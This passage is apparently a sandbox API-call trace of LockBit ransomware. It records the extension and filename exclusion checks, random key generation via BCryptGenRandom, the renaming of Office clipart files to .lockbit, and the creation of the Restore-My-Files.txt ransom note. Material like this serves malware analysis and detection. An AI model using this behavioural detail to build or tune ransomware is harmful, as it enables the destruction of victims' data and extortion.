lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.509] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.510] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.510] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.510] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.510] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.510] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.510] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.510] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="EN00006_.WMF") returned 1 [0113.510] lstrcmpiW (lpString1="ntldr", lpString2="EN00006_.WMF") returned 1 [0113.510] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="EN00006_.WMF") returned 1 [0113.510] lstrcmpiW (lpString1="bootsect.bak", lpString2="EN00006_.WMF") returned -1 [0113.510] lstrcmpiW (lpString1="autorun.inf", lpString2="EN00006_.WMF") returned -1 [0113.510] lstrcmpiW (lpString1="thumbs.db", lpString2="EN00006_.WMF") returned 1 [0113.510] lstrcmpiW (lpString1="iconcache.db", lpString2="EN00006_.WMF") returned 1 [0113.510] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.510] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned=".WMF" [0113.510] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.510] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.510] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.510] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.510] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.510] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.511] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.580] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.580] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF.lockbit") returned 72 [0113.580] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.582] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.582] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.582] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=13936) returned 1 [0113.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.583] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.583] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.583] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.583] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.590] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.590] malloc (_Size=0xa6) returned 0x77d7a8 [0113.590] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.595] free (_Block=0x77d7a8) [0113.595] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.595] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.596] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.596] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57852200, ftCreationTime.dwHighDateTime=0x1bd4b33, ftLastAccessTime.dwLowDateTime=0x51fbcc50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x57852200, ftLastWriteTime.dwHighDateTime=0x1bd4b33, nFileSizeHigh=0x0, nFileSizeLow=0x1b1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="EN00202_.WMF", cAlternateFileName="")) returned 1 [0113.596] lstrcmpiW (lpString1=".", lpString2="EN00202_.WMF") returned -1 [0113.596] lstrcmpiW (lpString1="..", lpString2="EN00202_.WMF") returned -1 [0113.596] PathFindExtensionW (pszPath="EN00202_.WMF") returned=".WMF" [0113.596] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.596] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.597] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.597] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="EN00202_.WMF") returned 1 [0113.598] lstrcmpiW (lpString1="ntldr", lpString2="EN00202_.WMF") returned 1 [0113.598] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="EN00202_.WMF") returned 1 [0113.598] lstrcmpiW (lpString1="bootsect.bak", lpString2="EN00202_.WMF") returned -1 [0113.598] lstrcmpiW (lpString1="autorun.inf", lpString2="EN00202_.WMF") returned -1 [0113.598] lstrcmpiW (lpString1="thumbs.db", lpString2="EN00202_.WMF") returned 1 [0113.598] lstrcmpiW (lpString1="iconcache.db", lpString2="EN00202_.WMF") returned 1 [0113.598] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.598] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned=".WMF" [0113.598] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.598] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.598] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.599] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.599] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF.lockbit") returned 72 [0113.600] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.601] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.601] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.601] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6938) returned 1 [0113.601] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.602] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.603] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.603] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.609] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.612] malloc (_Size=0xa6) returned 0x77d7a8 [0113.612] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0113.613] free (_Block=0x77d7a8) [0113.613] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.613] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.613] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.613] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a68a00, ftCreationTime.dwHighDateTime=0x1bd4b29, ftLastAccessTime.dwLowDateTime=0x51fbcc50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd7a68a00, ftLastWriteTime.dwHighDateTime=0x1bd4b29, nFileSizeHigh=0x0, nFileSizeLow=0x3044, dwReserved0=0x0, dwReserved1=0x0, cFileName="EN00222_.WMF", cAlternateFileName="")) returned 1 [0113.613] lstrcmpiW (lpString1=".", lpString2="EN00222_.WMF") returned -1 [0113.613] lstrcmpiW (lpString1="..", lpString2="EN00222_.WMF") returned -1 [0113.613] PathFindExtensionW (pszPath="EN00222_.WMF") returned=".WMF" [0113.613] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.613] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.613] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.613] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.613] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.613] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.613] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.613] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.613] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.613] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.613] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.613] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.614] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.614] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="EN00222_.WMF") returned 1 [0113.615] lstrcmpiW (lpString1="ntldr", lpString2="EN00222_.WMF") returned 1 [0113.615] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="EN00222_.WMF") returned 1 [0113.615] lstrcmpiW (lpString1="bootsect.bak", lpString2="EN00222_.WMF") returned -1 [0113.615] lstrcmpiW (lpString1="autorun.inf", lpString2="EN00222_.WMF") returned -1 [0113.615] lstrcmpiW (lpString1="thumbs.db", lpString2="EN00222_.WMF") returned 1 [0113.615] lstrcmpiW (lpString1="iconcache.db", lpString2="EN00222_.WMF") returned 1 [0113.615] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.615] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned=".WMF" [0113.615] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.615] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.615] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.616] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.616] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF.lockbit") returned 72 [0113.616] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.617] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.617] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.617] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12356) returned 1 [0113.617] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.618] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.619] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.625] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF.lockbit", 